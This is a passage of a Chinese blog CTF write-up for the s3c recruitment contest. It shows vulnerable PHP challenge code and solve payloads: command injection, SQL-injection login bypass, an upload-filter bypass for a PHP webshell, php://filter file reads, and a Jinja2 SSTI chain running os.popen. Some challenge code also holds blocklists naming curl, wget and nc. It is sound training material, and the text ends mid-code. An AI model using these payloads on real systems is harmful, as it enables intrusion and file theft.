<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="s3c招新赛WP, web前端,PHP,SQL注入,一些比赛wp等">
    <meta name="description" content="本网站是个人兴趣爱好，总结分享经验，记录生活点滴的平台，希望在以后的学习旅途中，走出自己的风景。">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>s3c招新赛WP | web手走的路还要很长</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>
    <link rel="stylesheet" type="text/css" href="/css/loading.css">
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
    
  <div id="loading-box">
    <div class="loading-left-bg"></div>
    <div class="loading-right-bg"></div>
    <div class="spinner-box">
      <div class="configure-border-1">
        <div class="configure-core"></div>
      </div>
      <div class="configure-border-2">
        <div class="configure-core"></div>
      </div>
      <div class="loading-word">加载中...</div>
    </div>
  </div>
  <!-- 页面加载动画 -->
  <script>
    $(document).ready(function () {
      document.body.style.overflow = 'auto';
      document.getElementById('loading-box').classList.add("loaded")
    })
  </script>

    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/images/loading.gif" data-original="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">web手走的路还要很长</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/images/loading.gif" data-original="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">web手走的路还要很长</div>
        <div class="logo-desc">
            
            本网站是个人兴趣爱好，总结分享经验，记录生活点滴的平台，希望在以后的学习旅途中，走出自己的风景。
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    
<script src="/libs/cryptojs/crypto-js.min.js"></script>
<script>
    (function() {
        let pwd = '';
        if (pwd && pwd.length > 0) {
            if (pwd !== CryptoJS.SHA256(prompt('请输入访问本文章的密码')).toString(CryptoJS.enc.Hex)) {
                alert('密码错误，将返回主页！');
                location.href = '/';
            }
        }
    })();
</script>




<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/4.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">s3c招新赛WP</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E6%AF%94%E8%B5%9BWP/">
                                <span class="chip bg-color">比赛WP</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/CTF/" class="post-category">
                                CTF
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2022-10-23
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2022-10-30
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    2.9k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    13 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="S3c比赛WP"><a href="#S3c比赛WP" class="headerlink" title="S3c比赛WP"></a>S3c比赛WP</h1><p>[TOC]</p>
<p>前言：第三场比赛，本人比较喜欢记录，但可能因为懒，wp不是那么的详细，不懂的欢迎随时来问我！本次做了web和misc方向！</p>
<h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><hr>
<h3 id="EsayPHP"><a href="#EsayPHP" class="headerlink" title="EsayPHP"></a>EsayPHP</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">// ‮⁦CTFer⁩⁦Hello</span><br><span class="line">if (&quot;admin&quot; == $_GET[username] &amp;‮⁦+!!⁩⁦&amp; &quot;‮⁦CTF⁩⁦s3cctf&quot; == $_GET[‮⁦S3c⁩⁦password]) &#123; //Welcome to </span><br><span class="line">    include &quot;flag.php&quot;;</span><br><span class="line">    echo $flag;</span><br><span class="line">&#125;</span><br><span class="line">show_source(__FILE__);</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p>打开记事本，如下图：</p>
<p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp10.png"></p>
<p>特殊url字符匹配，去掉符号的url编码，然后按照传参数顺序即可</p>
<p>payload如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?username=admin&amp;%e2%80%ae%e2%81%a6S3c%e2%81%a9%e2%81%a6password=%e2%80%ae%e2%81%a6CTF%e2%81%a9%e2%81%a6s3cctf</span><br></pre></td></tr></table></figure>



<h3 id="南京殇1"><a href="#南京殇1" class="headerlink" title="南京殇1"></a>南京殇1</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"> $ip=$_GET[&#x27;IP&#x27;]; </span><br><span class="line"> </span><br><span class="line"> if(preg_match(&quot;/\*|\||\[|\]|\(|\)|\&#123;|\&#125;|\-/i&quot;,$ip))</span><br><span class="line">              &#123;</span><br><span class="line">                   die(&#x27; 里在干神魔? &#x27;);</span><br><span class="line">              &#125;</span><br><span class="line">if(preg_match(&quot;/eval|bash|base/im&quot;,$ip))</span><br><span class="line">              &#123;</span><br><span class="line">                   die(&#x27; ???? &#x27;);</span><br><span class="line">              &#125;</span><br><span class="line"></span><br><span class="line">               </span><br><span class="line"> system(&#x27;ping -c 2 &#x27;.$ip);</span><br><span class="line">PING 127.0.0.1 (127.0.0.1): 56 data bytes</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload ：127.0.0.1&amp;ls       然后127.0.0.1&amp;cat ardiy.php</span><br></pre></td></tr></table></figure>



<h3 id="南京殇2"><a href="#南京殇2" class="headerlink" title="南京殇2"></a>南京殇2</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">世上的事都是人堆砌起来的，又被人纷纷撇扬了去，漫不经心...浑不知这是历史。</span><br><span class="line">我行走在现在，又行走在历史，分分钟编程人人揣测的虚影子。</span><br><span class="line">笔记最后她写道 想知道我的真心么</span><br><span class="line">&lt;?php </span><br><span class="line">include(&#x27;2.php&#x27;);</span><br><span class="line">echo &#x27;&lt;br /&gt; &#x27;;</span><br><span class="line">$x=$_GET[&quot;X&quot;];</span><br><span class="line">$y=$_POST[&quot;Y&quot;];</span><br><span class="line">if(preg_match(&quot;/[a-d]|[f-z]/im&quot;,$x))</span><br><span class="line">&#123;</span><br><span class="line">    die(&#x27; 她已将真心封藏，到底多少热情的碰撞才能唤醒这份... &#x27;);</span><br><span class="line">&#125;</span><br><span class="line">if(preg_match(&quot;/curl|wget|nc/im&quot;,$x))</span><br><span class="line">&#123;</span><br><span class="line">    die(&#x27; no RCE  &#x27;);</span><br><span class="line">&#125;</span><br><span class="line">if (!isset($x)) &#123;</span><br><span class="line">    echo $A ;</span><br><span class="line">    echo &#x27;&lt;br /&gt;&#x27;;</span><br><span class="line">&#125; </span><br><span class="line">else</span><br><span class="line">    if($x==md5($x))</span><br><span class="line">        &#123;</span><br><span class="line">            echo $C;</span><br><span class="line">            echo &#x27;&lt;br /&gt;&#x27;;</span><br><span class="line">           </span><br><span class="line">        	echo $D;</span><br><span class="line">        echo &#x27;&lt;br /&gt;&#x27;;</span><br><span class="line">            if(isset($y))</span><br><span class="line">            &#123;</span><br><span class="line">                 if(preg_match(&quot;/[1-9]|[a-z]/im&quot;,$y))</span><br><span class="line">               &#123;</span><br><span class="line">                    die(&#x27; hack go away &#x27;);</span><br><span class="line">               &#125;</span><br><span class="line">                 else</span><br><span class="line">               &#123;    </span><br><span class="line">                       system(&quot;cat &quot;.$y.&quot;.php&quot;);</span><br><span class="line">               &#125; </span><br><span class="line">            &#125;</span><br><span class="line">        &#125;else &#123;echo $B;&#125;</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>通过代码审计可知，x的值&#x3D;&#x3D;MD5后x的值，因为是弱比较，php的特性又是0e后不加数字就截断，所以只要保证x&#x3D;0exxxx，md5（x）&#x3D;0exxxx，即可 0&#x3D;&#x3D;0，绕过！y的值先试试&#x2F;*，看到flag in 1.php！数字1又被过滤了？这…..，然后想到..&#x2F;是当前目录 ..&#x2F;**&#x2F;  又表示列出当前目录所有文件，F12读取源码即可！</p>
<p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp14.png"></p>
<h3 id="一句话木马"><a href="#一句话木马" class="headerlink" title="一句话木马"></a>一句话木马</h3><p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp2.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload：111=include(&#x27;/flag.txt&#x27;);var_dump(get_defined_vars()); 这是一种命令执行姿势！</span><br><span class="line"></span><br><span class="line">​	111=include(&#x27;/flag.txt&#x27;);   111=include(&#x27;/flag.txt&#x27;);echo $flag;  111=system(&#x27;cat /flag.txt&#x27;);</span><br></pre></td></tr></table></figure>



<h3 id="Sc网盘"><a href="#Sc网盘" class="headerlink" title="Sc网盘"></a>Sc网盘</h3><p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp5.png"></p>
<p>F12源码是SQL注入，并且输入用户名给出是admin，注入密码，直接万能密码</p>
<p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp6.png"></p>
<h3 id="welcome-to-s3c"><a href="#welcome-to-s3c" class="headerlink" title="welcome_to_s3c"></a>welcome_to_s3c</h3><p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp4.png"></p>
<p>进入的页面加载就有，直接复制即可</p>
<h3 id="flag给你了"><a href="#flag给你了" class="headerlink" title="flag给你了"></a>flag给你了</h3><p>让我用PUT提交一个s3c，直接BP抓包，然后通过PUT传参或者在post的位置直接输入s3c，拿到flag</p>
<p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp12.png"></p>
<p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp13.png"></p>
<p>题目说一半已经给了，一半你要自己找正好对应一个1ndex.php和index.php两个网页，每个一半flag！</p>
<p>s3c{W0w_y0U_goT_tW0_f1ags!}</p>
<h3 id="ezupload（同彩蛋黑客入侵）"><a href="#ezupload（同彩蛋黑客入侵）" class="headerlink" title="ezupload（同彩蛋黑客入侵）"></a>ezupload（同彩蛋黑客入侵）</h3><p>题目只能上传图片类型的文件，但我们得上传一个php文件才能远程连接蚁剑！故只需要在传文件的时候BP抓包，然后</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">修改文件名为：66.PphpHP%00的url解码.jpg即可绕过</span><br></pre></td></tr></table></figure>



<h3 id="没有对象就new一个叭"><a href="#没有对象就new一个叭" class="headerlink" title="没有对象就new一个叭"></a>没有对象就new一个叭</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">if ( isset($_GET[&quot;s3c&quot;]) &amp;&amp; isset($_GET[&quot;obj&quot;]))</span><br><span class="line">&#123;</span><br><span class="line">    $s3c = $_GET[&quot;s3c&quot;];</span><br><span class="line">    $obj = $_GET[&quot;obj&quot;];</span><br><span class="line">    echo new $obj($s3c); </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>一眼顶针，用PHP内置原生类来做</p>
<h6 id="步骤1：读取目录的文件有哪些"><a href="#步骤1：读取目录的文件有哪些" class="headerlink" title="步骤1：读取目录的文件有哪些"></a>步骤1：读取目录的文件有哪些</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?obj=Filesystemlterator&amp;s3c=.(.代表当前目录)    扫描出文件f14gggggggggg.php</span><br></pre></td></tr></table></figure>

<h6 id="步骤2：读取文件内容"><a href="#步骤2：读取文件内容" class="headerlink" title="步骤2：读取文件内容"></a>步骤2：读取文件内容</h6><p>由于直接读取f14gggggggggg.php由于位数闲置读取不行，故使用伪协议！payload如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?obj=SplFileObject&amp;s3c=php://filter/convert.base64-encode/resource=f14gggggggggg.php</span><br></pre></td></tr></table></figure>



<h3 id="CTFer的礼物"><a href="#CTFer的礼物" class="headerlink" title="CTFer的礼物"></a>CTFer的礼物</h3><p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp8.png"></p>
<p>通过页面的名字，gift&#x3D;233，让我进入url&#x2F;get.php，页面没什么东西，F12源码看</p>
<p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp9.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">md5碰撞，这里我们采用数组直接绕过的方式：url/get.php?S3C[]=1&amp;CTF[]=2     得到flag！</span><br></pre></td></tr></table></figure>



<h3 id="EZpython"><a href="#EZpython" class="headerlink" title="EZpython"></a>EZpython</h3><p>让我们 nc 139.224.221.75 34251</p>
<p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp11.png"></p>
<p>一眼python命令执行，os模块输出！拿到flag</p>
<h3 id="解压小游戏"><a href="#解压小游戏" class="headerlink" title="解压小游戏"></a>解压小游戏</h3><p>直接查看far.js里看到源码</p>
<p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp15.png"></p>
<h3 id="EZssti"><a href="#EZssti" class="headerlink" title="EZssti"></a>EZssti</h3><p>首先登录界面，结合题目，我们可以判断出是SSti注入！我会在另一篇文章详细介绍！所以这里简单介绍下思路！</p>
<p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp17.png"></p>
<h6 id="步骤1：读取所有类"><a href="#步骤1：读取所有类" class="headerlink" title="步骤1：读取所有类"></a>步骤1：读取所有类</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#x27;&#x27;.__class__.__mro__.__getitem__(1).__subclasses__()&#125;&#125;   我用的</span><br><span class="line">&#123;&#123;url_for.__globals__&#125;&#125;   另个大佬的</span><br></pre></td></tr></table></figure>

<p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp18.png"></p>
<p>通过浏览器的ctrl+f搜索，确定了warnings.catch_warnings类的位置在133，这个类内置eval函数可以利用！</p>
<p>然后这题过滤了[],flag,config等！try，again的回显表示payload不对。</p>
<h6 id="步骤2：读取子类，方便后续"><a href="#步骤2：读取子类，方便后续" class="headerlink" title="步骤2：读取子类，方便后续"></a>步骤2：读取子类，方便后续</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#x27;&#x27;.__class__.__bases__.__getitem__(0)&#125;&#125;    确定了子类的位置在0，返回了&lt;object&gt;</span><br></pre></td></tr></table></figure>

<h6 id="步骤3：构造payload：绕过-即可"><a href="#步骤3：构造payload：绕过-即可" class="headerlink" title="步骤3：构造payload：绕过[]即可"></a>步骤3：构造payload：绕过[]即可</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;().__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(133).__init__.__globals__.__getitem__(&#x27;__builtins__&#x27;).__getitem__(&#x27;eval&#x27;)(&#x27;__import__(&quot;os&quot;).popen(&quot;cat /f*&quot;).read()&#x27;)&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>从读取子类后面开始，payload为固定内容，所以其实很简单！</p>
<h3 id="RandomNumber"><a href="#RandomNumber" class="headerlink" title="RandomNumber"></a>RandomNumber</h3><p>进入题目，</p>
<p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp19.png"></p>
<p>盲猜是php种子随机数，毕竟没有真正的随机数！所以用GitHub的工具在kali进行爆破。具体操作如下：</p>
<h6 id="步骤1：爆破种子"><a href="#步骤1：爆破种子" class="headerlink" title="步骤1：爆破种子"></a>步骤1：爆破种子</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">在工具文件打开终端输入：     ./php_mt_seed 给的随机数     即可爆破出种子</span><br></pre></td></tr></table></figure>

<h6 id="步骤2：生成伪随机数"><a href="#步骤2：生成伪随机数" class="headerlink" title="步骤2：生成伪随机数"></a>步骤2：生成伪随机数</h6><p>这里补充个常识：种子一般是0-100的，所以直接用这个范围里的就行了，然后取屏幕里第三个数的下一个数即可！</p>
<h3 id="EZPOP"><a href="#EZPOP" class="headerlink" title="EZPOP"></a>EZPOP</h3><p>非常简单的一道pop链子题，完全就是考对魔术方法的理解，进入界面，看源码。</p>
<h6 id="步骤1：代码审计"><a href="#步骤1：代码审计" class="headerlink" title="步骤1：代码审计"></a>步骤1：代码审计</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">class p&#123;</span><br><span class="line">  